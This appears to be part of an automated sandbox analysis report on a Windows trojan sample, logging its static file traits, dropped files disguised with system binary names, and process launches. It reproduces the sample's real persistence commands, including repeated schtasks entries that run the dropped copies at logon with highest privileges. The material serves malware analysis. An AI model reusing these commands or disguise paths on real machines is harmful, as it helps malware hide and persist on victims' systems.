            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeCode function: 0_2_001EFDFA0_2_001EFDFA
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeCode function: 0_2_001DBE130_2_001DBE13
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeCode function: 0_2_001DDE6C0_2_001DDE6C
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeCode function: 0_2_001D5F3C0_2_001D5F3C
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeCode function: 0_2_001F0F780_2_001F0F78
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeCode function: 4_2_00007FFD9BAA35954_2_00007FFD9BAA3595
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeCode function: 28_2_00007FFD9BA9359528_2_00007FFD9BA93595
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeCode function: 28_2_00007FFD9BAA5DE128_2_00007FFD9BAA5DE1
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeCode function: 28_2_00007FFD9BAA6C4028_2_00007FFD9BAA6C40
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeCode function: 28_2_00007FFD9BAA374828_2_00007FFD9BAA3748
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeCode function: 28_2_00007FFD9BAA4D2D28_2_00007FFD9BAA4D2D
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeCode function: 28_2_00007FFD9BAA752128_2_00007FFD9BAA7521
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeCode function: 28_2_00007FFD9BAA440928_2_00007FFD9BAA4409
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeCode function: 28_2_00007FFD9BAA235D28_2_00007FFD9BAA235D
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeCode function: 28_2_00007FFD9BAA1CE928_2_00007FFD9BAA1CE9
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeCode function: 28_2_00007FFD9BAA374028_2_00007FFD9BAA3740
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeCode function: 28_2_00007FFD9BAA42A128_2_00007FFD9BAA42A1
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeCode function: 30_2_00007FFD9BAB359530_2_00007FFD9BAB3595
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeCode function: 33_2_00007FFD9BAA359533_2_00007FFD9BAA3595
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeCode function: 33_2_00007FFD9BAAA7ED33_2_00007FFD9BAAA7ED
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeCode function: 33_2_00007FFD9BAAA21533_2_00007FFD9BAAA215
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeCode function: 33_2_00007FFD9BAAADC033_2_00007FFD9BAAADC0
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeCode function: 33_2_00007FFD9BAAE27033_2_00007FFD9BAAE270
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeCode function: 34_2_00007FFD9BAB359534_2_00007FFD9BAB3595
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeCode function: String function: 001EE360 appears 52 times
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeCode function: String function: 001EE28C appears 35 times
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeCode function: String function: 001EED00 appears 31 times
            Source: chainMonitor.exe.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: Idle.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: mmeUVmNHPOdst.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: c62q1qZ8kX.exe, 00000000.00000002.1680635152.000000000268A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs c62q1qZ8kX.exe
            Source: c62q1qZ8kX.exe, 00000000.00000002.1680635152.000000000268A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs c62q1qZ8kX.exe
            Source: c62q1qZ8kX.exe, 00000000.00000003.1677692227.0000000004BD9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs c62q1qZ8kX.exe
            Source: c62q1qZ8kX.exe, 00000000.00000003.1677175661.0000000004BDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs c62q1qZ8kX.exe
            Source: c62q1qZ8kX.exe, 00000000.00000003.1676268067.0000000004AC2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs c62q1qZ8kX.exe
            Source: c62q1qZ8kX.exe, 00000000.00000003.1679937411.0000000002688000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs c62q1qZ8kX.exe
            Source: c62q1qZ8kX.exe, 00000000.00000003.1679937411.0000000002688000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs c62q1qZ8kX.exe
            Source: c62q1qZ8kX.exeBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs c62q1qZ8kX.exe
            Source: c62q1qZ8kX.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 0.3.c62q1qZ8kX.exe.4b0f542.0.raw.unpack, Segm1DSJ7h057T1iACN.csCryptographic APIs: 'TransformBlock'
            Source: 0.3.c62q1qZ8kX.exe.4b0f542.0.raw.unpack, Segm1DSJ7h057T1iACN.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.3.c62q1qZ8kX.exe.4b0f542.0.raw.unpack, L2YDcmKRhuRvjZdhj5X.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.c62q1qZ8kX.exe.4b0f542.0.raw.unpack, L2YDcmKRhuRvjZdhj5X.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.c62q1qZ8kX.exe.4c2c542.1.raw.unpack, Segm1DSJ7h057T1iACN.csCryptographic APIs: 'TransformBlock'
            Source: 0.3.c62q1qZ8kX.exe.4c2c542.1.raw.unpack, Segm1DSJ7h057T1iACN.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.3.c62q1qZ8kX.exe.4c2c542.1.raw.unpack, L2YDcmKRhuRvjZdhj5X.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.c62q1qZ8kX.exe.4c2c542.1.raw.unpack, L2YDcmKRhuRvjZdhj5X.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.c62q1qZ8kX.exe.4c2c542.1.raw.unpack, ud7MQOusfFuoOVGUMvR.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.3.c62q1qZ8kX.exe.4c2c542.1.raw.unpack, ud7MQOusfFuoOVGUMvR.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.3.c62q1qZ8kX.exe.4b0f542.0.raw.unpack, ud7MQOusfFuoOVGUMvR.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.3.c62q1qZ8kX.exe.4b0f542.0.raw.unpack, ud7MQOusfFuoOVGUMvR.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.troj.evad.winEXE@39/28@0/0
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeCode function: 0_2_001D6EC9 GetLastError,FormatMessageW,0_2_001D6EC9
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeCode function: 0_2_001E9E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_001E9E1C
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeFile created: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeFile created: C:\Users\Default\mmeUVmNHPOdst.exeJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:432:120:WilError_03
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeMutant created: NULL
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeMutant created: \Sessions\1\BaseNamedObjects\Local\0e074db691fec0439ad17dd4b802ed6965179822
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeFile created: C:\Users\user\AppData\Local\Temp\QiyHNrWFuoJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\blockrefSessionBrokerDll\jNiINMcACfpGfudqTH4IxZpVWTbF.bat" "
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeCommand line argument: sfxname0_2_001ED5D4
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeCommand line argument: sfxstime0_2_001ED5D4
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeCommand line argument: STARTDLG0_2_001ED5D4
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeCommand line argument: xj"0_2_001ED5D4
            Source: c62q1qZ8kX.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: c62q1qZ8kX.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeFile read: C:\Windows\win.iniJump to behavior
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: c62q1qZ8kX.exeVirustotal: Detection: 58%
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeFile read: C:\Users\user\Desktop\c62q1qZ8kX.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\c62q1qZ8kX.exe "C:\Users\user\Desktop\c62q1qZ8kX.exe"
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\blockrefSessionBrokerDll\5sVJrvWE.vbe"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\blockrefSessionBrokerDll\jNiINMcACfpGfudqTH4IxZpVWTbF.bat" "
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\blockrefSessionBrokerDll\chainMonitor.exe "C:\blockrefSessionBrokerDll\chainMonitor.exe"
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "mmeUVmNHPOdstm" /sc MINUTE /mo 9 /tr "'C:\Users\Default\mmeUVmNHPOdst.exe'" /f
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "mmeUVmNHPOdst" /sc ONLOGON /tr "'C:\Users\Default\mmeUVmNHPOdst.exe'" /rl HIGHEST /f
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "mmeUVmNHPOdstm" /sc MINUTE /mo 9 /tr "'C:\Users\Default\mmeUVmNHPOdst.exe'" /rl HIGHEST /f
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "mmeUVmNHPOdstm" /sc MINUTE /mo 5 /tr "'C:\Recovery\mmeUVmNHPOdst.exe'" /f
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "mmeUVmNHPOdst" /sc ONLOGON /tr "'C:\Recovery\mmeUVmNHPOdst.exe'" /rl HIGHEST /f
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "mmeUVmNHPOdstm" /sc MINUTE /mo 11 /tr "'C:\Recovery\mmeUVmNHPOdst.exe'" /rl HIGHEST /f
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 13 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exe'" /f
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exe'" /rl HIGHEST /f
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 5 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exe'" /rl HIGHEST /f
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "mmeUVmNHPOdstm" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Defender\en-US\mmeUVmNHPOdst.exe'" /f
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "mmeUVmNHPOdst" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\en-US\mmeUVmNHPOdst.exe'" /rl HIGHEST /f
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "mmeUVmNHPOdstm" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Defender\en-US\mmeUVmNHPOdst.exe'" /rl HIGHEST /f
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows NT\Accessories\en-GB\conhost.exe'" /f
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Windows NT\Accessories\en-GB\conhost.exe'" /rl HIGHEST /f
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows NT\Accessories\en-GB\conhost.exe'" /rl HIGHEST /f
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 6 /tr "'C:\Program Files\7-Zip\Lang\TextInputHost.exe'" /f
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\TextInputHost.exe'" /rl HIGHEST /f
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 11 /tr "'C:\Program Files\7-Zip\Lang\TextInputHost.exe'" /rl HIGHEST /f
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\java\jre-1.8\lib\applet\WmiPrvSE.exe'" /f
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files (x86)\java\jre-1.8\lib\applet\WmiPrvSE.exe'" /rl HIGHEST /f
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\java\jre-1.8\lib\applet\WmiPrvSE.exe'" /rl HIGHEST /f
            Source: unknownProcess created: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exe "C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exe"
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "mmeUVmNHPOdstm" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\AppData\Local\Application Data\History\mmeUVmNHPOdst.exe'" /f
            Source: unknownProcess created: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exe "C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exe"
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "mmeUVmNHPOdst" /sc ONLOGON /tr "'C:\Users\Default User\AppData\Local\Application Data\History\mmeUVmNHPOdst.exe'" /rl HIGHEST /f
            Source: unknownProcess created: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exe "C:\Users\Default User\AppData\Local\Application Data\History\mmeUVmNHPOdst.exe"
            Source: unknownProcess created: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exe "C:\Users\Default User\AppData\Local\Application Data\History\mmeUVmNHPOdst.exe"
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\microsoft onedrive\setup\logs\Idle.exe'" /f
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "mmeUVmNHPOdst" /sc ONLOGON /tr "'C:\Users\Public\Pictures\mmeUVmNHPOdst.exe'" /rl HIGHEST /f
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\blockrefSessionBrokerDll\5sVJrvWE.vbe" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\blockrefSessionBrokerDll\jNiINMcACfpGfudqTH4IxZpVWTbF.bat" "Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\blockrefSessionBrokerDll\chainMonitor.exe "C:\blockrefSessionBrokerDll\chainMonitor.exe"Jump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeSection loaded: dxgidebug.dllJump to behavior
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
